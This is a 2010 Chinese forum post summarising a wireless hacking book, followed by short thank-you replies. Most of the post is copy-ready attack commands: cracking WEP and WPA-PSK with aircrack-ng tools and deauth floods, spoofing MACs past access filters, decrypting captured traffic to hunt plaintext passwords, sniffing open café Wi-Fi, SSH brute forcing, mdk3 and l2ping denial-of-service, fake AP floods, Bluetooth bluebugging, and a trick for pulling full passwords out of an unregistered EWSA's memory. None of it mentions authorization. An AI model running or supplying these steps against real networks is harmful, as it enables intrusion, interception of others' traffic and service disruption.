格西欧解决方案
树熊
查看: 9503|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
( @1 V% _6 }4 P. D( N, Z. x( n. R
  v% V& ?' ?( W. N7 O0 f以下所有操作均在BackTrack 4中进行。
4 Q2 W. o" i, m
+ t9 G) f$ o- N- K
5 `2 I" q1 V4 F  N% Y4 c无线WEP加密P解:7 t- T% O* R5 u1 |

$ C$ F; M1 {2 M, s' J注入P解:
, W# n1 o" s6 L$ Z  V8 R1 ^& f5 n' _7 `
ifconfig
, f# x' }, _; ^: X% i8 H* h4 z, h) p+ ?
ifconfig –a
: X2 Y: j. C7 x# M8 M
7 X* F& m3 s9 S. Wifconfig wlan0(无线网卡) up
$ C: ?0 B8 G3 \! H- n) I! G: U" J3 l$ }
airmon-ng start wlan0+ \& i; b: N4 l. Z: o
# d4 y8 E! X! o5 q; u* U
airodump-ng mon0
4 J: Y: V6 u2 K: t
. {8 w$ e; @5 t( m' oairodump-ng --ivs –w ivsfile –c 频道 mon0或
$ ~, C. |$ H( \
' G% r# a, B, G; }airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0; i0 S1 g6 w: H8 q: A3 o8 e. P0 R' O

7 G4 W) h2 ^" S7 r4 d2 F& xaireplay-ng -3 –b BSSID –h Station mon0" ^  a, J/ N5 @* ~3 D" ~

+ o0 z1 _- o1 t6 _9 E( Maircrack-ng ivsfile-01.ivs8 {/ w$ @4 O% m5 I
/ |9 ?. c7 `+ y/ p' z1 G
虚连接P解(适用于无客户端连接APP解)
- q  i. a0 c* d  B/ L: C8 Q) b; F7 [3 h2 u" Q7 v
ifconfig
* s6 r2 N9 X8 m/ I% o9 V" J9 d& s: H* H3 k! E$ _
ifconfig –a& T- j: H4 H3 Z" q; n

, F2 {1 L% o7 sifconfig wlan0(无线网卡) up" x; g! c) q& M: f7 l$ N

' M- r6 l8 l& u/ T# fairmon-ng start wlan09 P  s$ a- H: O0 X1 \- U8 l8 ]& {
. W0 g; ?! Z' {% P' `
airodump-ng mon0' m$ R, X- C, r" X/ {0 e) F2 n1 J4 x, b
9 b, o% X- W4 W+ x6 q
airodump-ng --ivs –w ivsfile –c 频道 mon0或8 z: V3 S  k) N- S& e

+ S4 f' v/ i. R5 l3 Cairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
- H; n6 Z' x+ ^3 n5 R2 R
+ s$ }! \7 r9 {8 S. gaireplay-ng -1 0 –e SSID –a BSSID –c Station mon08 X& {9 ?& A+ B; n$ D+ r2 u

0 a* [) \, p8 [% X* x0 I: m4 Qaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
& |6 I) X# L) u; {' Z  o8 i
0 J" D, B5 S& x6 [aircrack-ng ivsfile-01.ivs7 S% f6 K0 _1 u. H$ U( V8 z

/ s# l" r! |1 m" ?" \5 a! ^1 y/ Y6 w
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。( A) ?; a; n# w  ^- ?
' W* h' v2 z, d$ c" f9 W
1 a/ w+ g+ H: U! Z
WPA-PSKP解' w" K2 n+ `8 l/ I' O
" K) M& z7 s7 W1 u
ifconfig0 i4 \1 i8 \7 w$ K
) X5 H& ?/ u7 \6 b$ Y, `
ifconfig –a4 ?' k" w. t7 @: F

  r% c: Q- Q2 ^ifconfig wlan0(无线网卡) up5 f1 f* J' E7 H- I

# ?/ M9 K6 y. F) Qairmon-ng start wlan0
& A9 q- _  A1 F7 M- Y; d. w6 b, X& t- d
airodump-ng mon0
0 `! u- L7 q. J7 M3 z* s
. S2 [  n) p: Qairodump-ng –w capfile –c 频道 mon0, C. l1 R3 g; A5 T0 g

4 G* T" I9 H5 S+ yaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包8 r% D, M$ T: H; e* G
# g) ]; J$ T6 X2 q8 o1 B4 b
aircrack-ng –w Dic capfile-01.cap或$ [- b+ |$ I+ N3 O' P

& e7 A. {- S6 H" Mcowpatty –f Dic –r capfile-01.cap –s SSID, l- U7 Q4 Y) ?' v6 W

& w& k5 v) H$ a7 @8 D4 @5 o; Acowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
8 \. K8 x1 o4 V2 x2 x- m" S- r% c( W: s5 K
傻瓜式P解软件SpoonWPA。. e6 M6 X7 m8 }, G% F

( I- [! V* y6 s% c4 C+ p- F! wBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
! y9 y7 K# Q, k* m0 X1 ^" C* T7 v6 d7 g" f5 r& Z
5 ?) `( o, ^7 |: w" P+ C9 L' b
字典文件的生成和上传0 U+ h# a9 ^# [- w) b

1 H$ n$ q0 y: G) z" a( u在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
. u8 i3 p& c7 n& F" O, m
( m( m8 ]7 @- ?, h1 U2 V" d* Z* F0 {/ e3 M3 k6 Z$ z' G  Y# u
BT4下开启Tftp:Services—TFTPD—start TFTPD
6 Q+ G7 s" D$ \$ ^, H7 y: x9 E! ]
$ l% d0 Z: H3 c( D+ S在Windows的CMD中运行 tftp –i IP put **.dic
( n% {* y) k- I4 }/ i* C; y
: Z7 j* S2 S8 H$ o0 d- x( G9 I" W! U6 e+ ^9 Q6 C4 Y
BT4下开启SSH:Services—SSH—start SSH/ Q" W5 P1 [- ^7 t

5 z* Q- ~' l: vWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root* \, D. a6 V% p
& J- C+ r% C9 X1 [7 Z: J) P

- R  l  o. I1 y' W0 bAP限制MAC时的解决% r' l- `$ p4 w
& x% L" Y3 S4 M: i
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
: R1 _; @5 M3 O2 M9 A' F/ d7 T4 d! C! p% Q! @
ifconfig wlan0 hw ether NewMAC0 L( X" m' ^3 H, Z
4 p" B, s, R4 F. ]6 E( D
+ h3 t0 v* P. k* k, y
关闭SSID广播的AP探测:0 \4 w! H: [5 J8 }
0 }0 \- I. @; b+ D
1.     Deauth攻击:
$ @3 k& X0 K+ }$ u
/ b! y* _' Y, H8 d& Y+ |) Kairodump-ng mon0
/ i, F; F. B6 ^6 W8 B! [3 M6 Q
' b) t4 ~& C/ ~. s4 D' paireplay-ng -0 10 –a BSSID –h Station mon0% p' L! f  N' ~) {# S2 W$ S9 f
6 b6 |9 }/ N+ |( n
2.     抓包分析0 ]& B7 K% }8 n% o+ S

* \) s9 p1 Q" ?, H, h) H+ v9 G- cOmnipeek
& T6 c( v8 K! G; `: d$ ~9 V. G% Y, i# u& g) H, G
Tcpdump –n –e –vvv –i 网卡名9 p9 K# ^( L& g, H7 z

6 m6 ?% i, O5 y$ L' J3.     暴力P解
, D- |. q7 |8 `9 L) k. {
( Y9 @! U; W: s& N- n2 R' lCharon 1.1暴力P解
: D/ c/ L* R9 W* ~# D0 W$ U! y' Z0 x$ t+ W, O$ x$ O+ P( f6 x
  p# V2 `6 b. a" V  S2 n
无线加密数据包的解密
4 i" T$ u1 j' J- C
8 t! A. h. G7 u4 Z% t3 v# _- i9 q' n6 E) C# Y& R% t
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
4 V6 p$ i- a% F, o9 @/ @/ j
" F  }- O+ r5 FFilterNS     DNS解析数据包5 d* ]3 J; Z/ K4 ^5 z5 T, u
$ `7 M/ Y$ R) Q: O
Filter:HTTP    WEB访问数据包
; ~( V4 ]7 G& m; G8 H1 D; Q3 D
  i% X7 Q, [6 pFilter:msnms   MSN
1 r5 j: b( c4 m) J. x$ g- L1 o: n2 a- ~- K! U- O4 Z
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。/ ^! b2 G6 H, e$ e( q6 j. W9 ~
# U# E3 w# @5 J( @0 g9 U
使用airdecap-ng解密:/ J7 y: l, F8 e7 G0 W
/ Y7 }2 @: Q+ V% C' h
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
! d, t8 E/ U. t6 N7 `
; ?! F" \! y/ C! L* D
( T9 v4 O- s6 s2 X6 I& c0 k咖啡馆中无线数据截取(开放式无加密AP)2 O% }( ]3 u4 i8 ?2 x. r
6 c0 F8 |; W+ W1 t/ L
1.Airodump-ng –w data –c频道 mon0
- @& k- J4 x2 L/ g& R7 J, `/ {8 A, l( y$ \/ D3 ~$ }
2.使用WireShark打开分析0 m3 K- R. g5 p$ W) [
1 `! H. T; c, w
6 T) |4 ^) W* G2 K
BT4下的渗透工具:+ D0 W5 i( {7 _  t6 V

1 N# x6 K( p+ E3 H; f  p, W$ gnmap –sP IP/24        判断C段下存活的主机
, E. [* [/ @0 k5 S+ [. j5 J8 U. Z, c0 Z( p. G& R3 [9 c) d
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放9 d+ n$ g0 ^% L5 P. L

  ~0 e$ }/ }3 m( cnmap –vv –sV IP –p port   指定端口的详细信息。。。6 e7 m. E$ J" |7 Q: \0 v
2 a, r, f9 {- j
namp –O IP/24    判断主机的系统版本8 x! B5 W8 t7 G+ M% R, k. O2 \

1 }* q% E3 D  |( k+ O% U% ^8 r+ i# k/ {+ i9 \
GUI 版nmap:Zenmap $ x  f# o5 ]7 p6 x

+ S  V9 C: j' X7 J6 M; R* ~; c+ s$ A  {7 \. a. u/ X
Amap使用:amap –B IP port" c! Y" a, ]; V* R( H- `% u
! o4 t# U; r: ~. E/ B; R
Nbtscan(扫描Windows网络NetBios信息):
9 G: ~* `: g4 m$ L* ?* m' d1 b
) h3 _0 W! B# P5 R9 ]. tnbtscan –v –s : IP/24/ s* R# O9 ?# S$ w
% o& {3 O8 F; _& u) |" ~
nbtscan –r IP. y0 I: J5 S. S0 m1 Z
1 P0 o4 Q0 H( D& i4 V4 O

& N. ^% V+ O+ ~. C6 `DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.; |0 q) S2 g/ d4 R' Z% r- v3 A
4 `  z9 {' n, d; E8 w
8 Y- \$ ^+ F* V- W- ?6 ^6 \* O
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
4 a  r+ O* ^: ~/ b: @
, f8 A! W2 L8 uBruteSSH: ./bruthe.py –h IP –u Username –d Dic
1 p5 i! g6 `8 Q* }& m4 `5 I
5 i* B# t8 f) h6 v  k$ XMetasploit3使用
  o9 t; }5 }( L( S* }无线D.0.S( f; o( F7 q9 W- I* E% l) ^
' N% g; N  T0 R; Q+ K3 n

! _, C3 w/ B, }7 k1 hAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
3 b) H* @! G; _+ @1 K0 j4 D7 k+ P- ?0 s: @' q
airmon-ng start wlan0
9 {2 O6 b' {9 i' |! M3 \% D- m( |
airodump-ng mon0
. m5 ~4 {5 S0 [/ ^! I6 J  }/ y. ?" Y2 S5 H& p
mdk3 mon0 a –a BSSID
, ~/ O% `  G& E
" u  f: W# p( j' h+ w对所有的AP攻击:mdk3 mon0 a
- x0 O9 m0 W8 o; ]3 b5 W
  z. ?# B7 Y0 h
7 o$ k1 ]' N, z7 n4 m& xDeauth Flood 攻击/ ?! S; `/ r8 x4 \+ N
& \# a* X! U+ E1 B0 R) P
mdk3 mon0 d –c Channel+ @+ e' l) K+ J
' e8 p9 b/ k+ u
图形化D.O.S攻击:Charon
- M! f% x# w% F; k5 G1 ~9 \5 o* m9 |5 ]1 R" g& G2 r

4 U' c1 p; [* b& e/ w当受到攻击时,使用Wireshark抓包可以看到异常信息。
+ m6 Y$ `* N! b+ p. C6 I; q/ a5 f" ?: d( k7 U
+ y3 T1 K' k0 h9 f6 ?8 R
WPA-PSK高速P解$ j/ y) ^- `4 D; {

* {% q. D/ v; r; A1.       WPA-PSK PMK Hash TablesP解, w& [7 H5 \: G
: K0 o. @+ a3 ^8 `
Cowpatty –d HashTable.hash –r ***.cap –s SSID
' N9 ^; W+ U* p* q0 t
2 P5 {$ O6 F) a" ~7 jHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
5 P7 y1 d; j8 _7 I3 |
' c3 k3 r6 G# j% ^2.       GPU辅助高速P解; x- J  o7 D$ O7 ]3 y, _$ U

9 h2 G, D& w1 }) D' s9 q; c使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。* ~; ?0 f) Z' _! A1 b6 j. D+ D
. {: i  F* x' ?# N% S+ G
3.       分布式P解
' W1 I; T+ i& M- j8 [; l( l# b) L
) a( K# J' i! {! _! o9 K+ W: W# e# H8 X/ k+ H
AP的伪造3 ]4 O1 V: i! n' d8 F. N1 p& w0 f* @

' X0 u0 S! P: u' u; V) r; I把AP的MAC改成目标AP的MAC
% \+ M0 p6 g3 H8 C7 c- L: M- \# X" C/ x6 F3 |
网卡软AP
5 W# D7 m( f7 m( A; J3 _
5 H6 i6 z. |; D* i' j9 A4 O: K0 n2 Z
伪造大量虚假AP信号:
, W- `) M. B* x9 {. I! p4 d6 F* s3 Y: B7 w# w: |
随机SSID:mdk3 mon0 b –g –c 频道 # N* ]& I2 ]; `: r8 y8 X

1 c1 C% L/ T% H0 T: g指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
9 P; h+ u# @- e
, m" m5 N: q! D: s7 H* ^6 O
! c' Y- ]5 I4 q: ?4 {$ @War-Driving
+ P4 l' e- m+ ~$ A5 B( f6 Y; a  }, `4 S" ?; B2 Q1 p
热点地图绘制$ O0 A7 M3 v2 d9 W; D

' p; m$ c' c, |3 \, wWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
+ ]" O- F+ u4 T8 P. i6 v8 |" D* N5 d; s: M* U" r  q

8 I% h3 K) E" G# v/ FNetstumble* d$ q: g- t* l

/ ~9 U# a8 r2 i5 G6 N4 |7 I( Z& E+ B& p+ Y
蓝牙Hacking- \6 X, `  [# e0 U
2 i0 p4 I  @8 E* a( M" ^
Windows下的Blue Soleil工具
  \$ U; i, E) G* D' o+ a  O# \
) O$ r. d8 i& e$ L! a- `% n* VBT4:9 w8 B9 ~. r) `  ]8 A0 t0 e' w

8 {$ C* ~' L' S/ @" w" \7 F' Shciconfig 查看蓝牙适配器
$ z- J" W: Z7 G4 k" r- u; B6 k: a) f9 Y9 G1 Y, l
hciconfig hci0 up 载入蓝牙适配器
: a. H+ P  ~. s$ V# q5 X! l7 e+ B" G4 z( Z; ~
hciconfig hci0 class 蓝牙适配器详细信息
! d8 C* s+ `( [, g" A
7 H. m: f& ?6 E& {5 l& ?4 Y( C! W0 J  D& G1 o& `3 C8 j
hcitool(扫描蓝牙)
/ i4 b+ t8 I. y+ c
. N& Z8 k! `, @7 U. J5 w4 ^hcitool –i hci0 scan* U0 e% s7 u0 W1 s% ^) N: F
1 {( D/ o* ~- ~" L8 t" S
BTscanner(扫描蓝牙)
- G. Q) }& v4 z! \" @
0 Y2 k: {6 `) t; V, s- n0 N. m, u; ]" {) y9 C
蓝牙攻击:: K3 _4 n& y, O

& x2 l3 U9 S: ~) uBlueBugging (适用于BlueTooth V1.1的手机)
7 v# k# {) l: A
" T) P' W+ _! {; J# t" T4 T6 y4 p* sBluebugger工具:
7 b( j2 S) U# F' }9 a, M, F. [7 i  ]* s& k+ ?- e
Bulebugger –a HD_Addr info' _. Z4 u4 i' R. A+ i1 q
, N8 _, S$ k0 q  p. [+ p
+ ]! t- \# _, L. B+ p
BlueJacking
5 |- m' }/ ~% V; y; n( Q5 i
+ M9 E$ o9 a7 n' t8 C实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。8 m# W8 M/ F5 W, V, m5 w5 ^7 E  P
7 ^/ ^( @2 J% w5 x! ^6 y2 Y
. E: _: x% [7 _
HD_Addr修改:
; g. f# i2 {  L+ Q9 ^0 ]
) c: x+ a5 D% L2 n2 R6 h' B4 DBdaddr工具
) h8 E& g1 W/ D6 e6 F4 J( l1 i/ F7 n) O0 f* l3 ]. J$ c
bdaddr –i 蓝牙设备名 新HD_addr
3 u( m  B# n( R. q- D! n9 E3 Q/ V2 e* R0 e" H# r* d

- F6 k. |$ K- `0 x/ P蓝牙D.O.S. t; E; r8 k6 i$ j0 A% I; u

* o! v+ C( p3 s7 F) sl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务* q+ b* J4 s; E5 i6 O6 u

! g9 F  b/ l6 [; nhciconfig# N1 C' U, _$ ~( B9 O

4 X* H" O8 p4 Q5 d/ y/ hhciconfig hci0 up
1 i1 d( N! a+ ?$ C* Y8 c1 ]3 Z. q; x8 z# ^, |4 s
hcitool –i hci0 scan
8 x7 k! t8 N7 W0 `3 V2 V( {
2 U1 [. _7 X- [l2ping –s 10000 –目标MAC2 N' i1 c# j+ I. a$ `, C% z

9 ]  r% [/ A& p+ Y0 M( l3 i' k8 L0 i+ z7 {; l) P. V9 i. Y$ F' D
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
9 S  k8 |6 E# h1 z4 p4 A3 M% o% M1 K' F6 N& L% D' e9 x
./fang –r ************-############ -s* q/ Y! Y( s* ~0 g
4 v  N( P+ ~& X9 I0 h  Q5 N5 J
暴力P解************-############的蓝牙设备8 A, `1 q% b/ @1 T# v; q5 [

+ f# }* P; f6 d- a./fang –l 各厂商BD_Addr分配
; a) O, G, d6 H1 I9 Z" }8 W
; s6 J; ?; _. [5 e$ k& I! m6 S/ E2 S- G
WifiZoo使用
0 y9 v1 ~2 O- |# p) B+ \) g6 F: ~) A+ {# T" x0 R' y
./wifizoo.py –c Capfile# Y+ s( @: ~6 Q9 I+ A' |

  D4 z# z9 `  N$ N% @访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

711

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。7 R  J  G/ w9 d' {& l& A
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
- n! g5 i% t( w呵呵 其实也不贵 21块 快递再一点
5 ?- T* @8 c: r5 s/ p7 f) ?我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2015-5-24 10:51 , Processed in 0.192040 second(s), 36 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表